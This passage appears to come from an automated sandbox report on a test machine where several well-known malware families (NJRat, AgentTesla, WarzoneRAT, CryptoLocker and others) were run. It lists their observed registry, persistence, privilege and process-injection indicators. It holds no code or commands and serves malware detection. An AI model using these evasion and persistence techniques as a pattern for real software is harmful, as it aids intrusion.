\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vbc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cheat.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winupdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vbc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ButterflyOnDesktop.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vbc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Azorult.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rfusclient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vbc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language notepad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rutserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wini.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 winit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString winit.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Delays execution with timeout.exe 7 IoCs
pid Process 4616 timeout.exe 5196 timeout.exe 4360 timeout.exe 5720 timeout.exe 5836 timeout.exe 5940 timeout.exe 5636 timeout.exe -
Enumerates system info in registry 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 4604 ipconfig.exe -
Kills process with taskkill 5 IoCs
pid Process 3588 taskkill.exe 496 taskkill.exe 1436 taskkill.exe 5712 taskkill.exe 1436 taskkill.exe -
Modifies registry class 11 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ winupdate.exe Key created \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Blackkomet.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ winupdate.exe Key created \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings wini.exe Key created \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\MIME\Database winit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset winit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage winit.exe Key created \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings R8.exe Key created \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2842058299-443432012-2465494467-1000\{D6DCA534-0027-48DB-9FFC-EC22F3BBB122} msedge.exe -
NTFS ADS 38 IoCs
description ioc Process File created C:\svchost\svchost.exe\:SmartScreen:$DATA RegSvcs.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 206033.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\AgentTesla.exe:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 862354.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 395135.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 874937.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 855524.crdownload:SmartScreen msedge.exe File created C:\Users\Admin\AppData\Roaming\jFvfxe.exe\:SmartScreen:$DATA WarzoneRAT.exe File created C:\Users\Admin\AppData\Roaming\jFvfxe.exe\:Zone.Identifier:$DATA WarzoneRAT.exe File created C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe\:SmartScreen:$DATA CryptoLocker.exe File opened for modification C:\Users\Admin\Downloads\Adwind.exe:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 904049.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Azorult.exe:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 406252.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\NetWire.exe:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\NJRat.exe:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 195103.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 769677.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 878329.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 927427.crdownload:SmartScreen msedge.exe File created C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe\:Zone.Identifier:$DATA CryptoLocker.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 838035.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\RevengeRAT.exe:Zone.Identifier msedge.exe File created C:\svchost\svchost.exe\:Zone.Identifier:$DATA RegSvcs.exe File created C:\Users\Admin\AppData\Roaming\svchost.exe\:Zone.Identifier:$DATA RegSvcs.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 581998.crdownload:SmartScreen msedge.exe File opened for modification C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 taskhostw.exe File opened for modification C:\Users\Admin\Downloads\$uckyLocker.exe:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 823291.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\CrimsonRAT.exe:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\WarzoneRAT.exe:Zone.Identifier msedge.exe File created C:\Users\Admin\AppData\Roaming\svchost.exe\:SmartScreen:$DATA RegSvcs.exe File opened for modification C:\Users\Admin\Downloads\butterflyondesktop.exe:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\MadMan.exe:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\WinNuke.98.exe:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\CryptoLocker.exe:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\Blackkomet.exe:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\CobaltStrike.doc:Zone.Identifier msedge.exe -
Runs .reg file with regedit 2 IoCs
pid Process 576 regedit.exe 3912 regedit.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1916 schtasks.exe 5360 schtasks.exe 1980 schtasks.exe 2156 schtasks.exe 5660 schtasks.exe 4788 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 5036 WINWORD.EXE 5036 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3536 msedge.exe 3536 msedge.exe 4736 msedge.exe 4736 msedge.exe 3320 identity_helper.exe 3320 identity_helper.exe 3616 msedge.exe 3616 msedge.exe 3152 msedge.exe 3152 msedge.exe 4884 msedge.exe 4884 msedge.exe 1992 identity_helper.exe 1992 identity_helper.exe 3100 msedge.exe 3100 msedge.exe 4448 msedge.exe 4448 msedge.exe 4732 msedge.exe 4732 msedge.exe 4344 msedge.exe 4344 msedge.exe 2156 msedge.exe 2156 msedge.exe 2156 msedge.exe 2156 msedge.exe 3304 msedge.exe 3304 msedge.exe 4612 msedge.exe 4612 msedge.exe 880 msedge.exe 880 msedge.exe 2328 NJRat.exe 2328 NJRat.exe 2328 NJRat.exe 2328 NJRat.exe 2328 NJRat.exe 2328 NJRat.exe 2328 NJRat.exe 2328 NJRat.exe 2328 NJRat.exe 2328 NJRat.exe 2328 NJRat.exe 2328 NJRat.exe 2328 NJRat.exe 2328 NJRat.exe 2328 NJRat.exe 2328 NJRat.exe 2328 NJRat.exe 2328 NJRat.exe 2328 NJRat.exe 2328 NJRat.exe 2328 NJRat.exe 2328 NJRat.exe 2328 NJRat.exe 2328 NJRat.exe 2328 NJRat.exe 2328 NJRat.exe 2328 NJRat.exe 2328 NJRat.exe 2328 NJRat.exe 2328 NJRat.exe 2328 NJRat.exe 2328 NJRat.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 3152 msedge.exe 2328 NJRat.exe 428 taskhostw.exe -
Suspicious behavior: LoadsDriver 3 IoCs
pid Process 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 47 IoCs
pid Process 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 5816 rfusclient.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 4100 Blackkomet.exe Token: SeSecurityPrivilege 4100 Blackkomet.exe Token: SeTakeOwnershipPrivilege 4100 Blackkomet.exe Token: SeLoadDriverPrivilege 4100 Blackkomet.exe Token: SeSystemProfilePrivilege 4100 Blackkomet.exe Token: SeSystemtimePrivilege 4100 Blackkomet.exe Token: SeProfSingleProcessPrivilege 4100 Blackkomet.exe Token: SeIncBasePriorityPrivilege 4100 Blackkomet.exe Token: SeCreatePagefilePrivilege 4100 Blackkomet.exe Token: SeBackupPrivilege 4100 Blackkomet.exe Token: SeRestorePrivilege 4100 Blackkomet.exe Token: SeShutdownPrivilege 4100 Blackkomet.exe Token: SeDebugPrivilege 4100 Blackkomet.exe Token: SeSystemEnvironmentPrivilege 4100 Blackkomet.exe Token: SeChangeNotifyPrivilege 4100 Blackkomet.exe Token: SeRemoteShutdownPrivilege 4100 Blackkomet.exe Token: SeUndockPrivilege 4100 Blackkomet.exe Token: SeManageVolumePrivilege 4100 Blackkomet.exe Token: SeImpersonatePrivilege 4100 Blackkomet.exe Token: SeCreateGlobalPrivilege 4100 Blackkomet.exe Token: 33 4100 Blackkomet.exe Token: 34 4100 Blackkomet.exe Token: 35 4100 Blackkomet.exe Token: 36 4100 Blackkomet.exe Token: SeIncreaseQuotaPrivilege 1704 winupdate.exe Token: SeSecurityPrivilege 1704 winupdate.exe Token: SeTakeOwnershipPrivilege 1704 winupdate.exe Token: SeLoadDriverPrivilege 1704 winupdate.exe Token: SeSystemProfilePrivilege 1704 winupdate.exe Token: SeSystemtimePrivilege 1704 winupdate.exe Token: SeProfSingleProcessPrivilege 1704 winupdate.exe Token: SeIncBasePriorityPrivilege 1704 winupdate.exe Token: SeCreatePagefilePrivilege 1704 winupdate.exe Token: SeBackupPrivilege 1704 winupdate.exe Token: SeRestorePrivilege 1704 winupdate.exe Token: SeShutdownPrivilege 1704 winupdate.exe Token: SeDebugPrivilege 1704 winupdate.exe Token: SeSystemEnvironmentPrivilege 1704 winupdate.exe Token: SeChangeNotifyPrivilege 1704 winupdate.exe Token: SeRemoteShutdownPrivilege 1704 winupdate.exe Token: SeUndockPrivilege 1704 winupdate.exe Token: SeManageVolumePrivilege 1704 winupdate.exe Token: SeImpersonatePrivilege 1704 winupdate.exe Token: SeCreateGlobalPrivilege 1704 winupdate.exe Token: 33 1704 winupdate.exe Token: 34 1704 winupdate.exe Token: 35 1704 winupdate.exe Token: 36 1704 winupdate.exe Token: SeIncreaseQuotaPrivilege 4588 winupdate.exe Token: SeSecurityPrivilege 4588 winupdate.exe Token: SeTakeOwnershipPrivilege 4588 winupdate.exe Token: SeLoadDriverPrivilege 4588 winupdate.exe Token: SeSystemProfilePrivilege 4588 winupdate.exe Token: SeSystemtimePrivilege 4588 winupdate.exe Token: SeProfSingleProcessPrivilege 4588 winupdate.exe Token: SeIncBasePriorityPrivilege 4588 winupdate.exe Token: SeCreatePagefilePrivilege 4588 winupdate.exe Token: SeBackupPrivilege 4588 winupdate.exe Token: SeRestorePrivilege 4588 winupdate.exe Token: SeShutdownPrivilege 4588 winupdate.exe Token: SeDebugPrivilege 4588 winupdate.exe Token: SeSystemEnvironmentPrivilege 4588 winupdate.exe Token: SeChangeNotifyPrivilege 4588 winupdate.exe Token: SeRemoteShutdownPrivilege 4588 winupdate.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe -
Suspicious use of SendNotifyMessage 38 IoCs
pid Process 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 4736 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 4716 ButterflyOnDesktop.exe 1280 ButterflyOnDesktop.exe 3884 ButterflyOnDesktop.exe 5828 ButterflyOnDesktop.exe 5336 ButterflyOnDesktop.exe 2588 ButterflyOnDesktop.exe 4144 ButterflyOnDesktop.exe 872 ButterflyOnDesktop.exe 1104 ButterflyOnDesktop.exe 3648 ButterflyOnDesktop.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe 3152 msedge.exe -
Suspicious use of SetWindowsHookEx 30 IoCs
pid Process 3152 msedge.exe 3152 msedge.exe 5036 WINWORD.EXE 5036 WINWORD.EXE 5036 WINWORD.EXE 5036 WINWORD.EXE 5036 WINWORD.EXE 5036 WINWORD.EXE 5036 WINWORD.EXE 5036 WINWORD.EXE 5036 WINWORD.EXE 5036 WINWORD.EXE 5036 WINWORD.EXE 916 AgentTesla.exe 3696 Azorult.exe 4024 wini.exe 2420 winit.exe 2364 rutserv.exe 3144 rutserv.exe 5816 rutserv.exe 5284 rutserv.exe 5872 cheat.exe 2248 taskhost.exe 6036 P.exe 1472 ink.exe 5868 R8.exe 6004 winlogon.exe 428 taskhostw.exe 808 winlogon.exe 3152 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4736 wrote to memory of 1556 4736 msedge.exe 81 PID 4736 wrote to memory of 1556 4736 msedge.exe 81 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 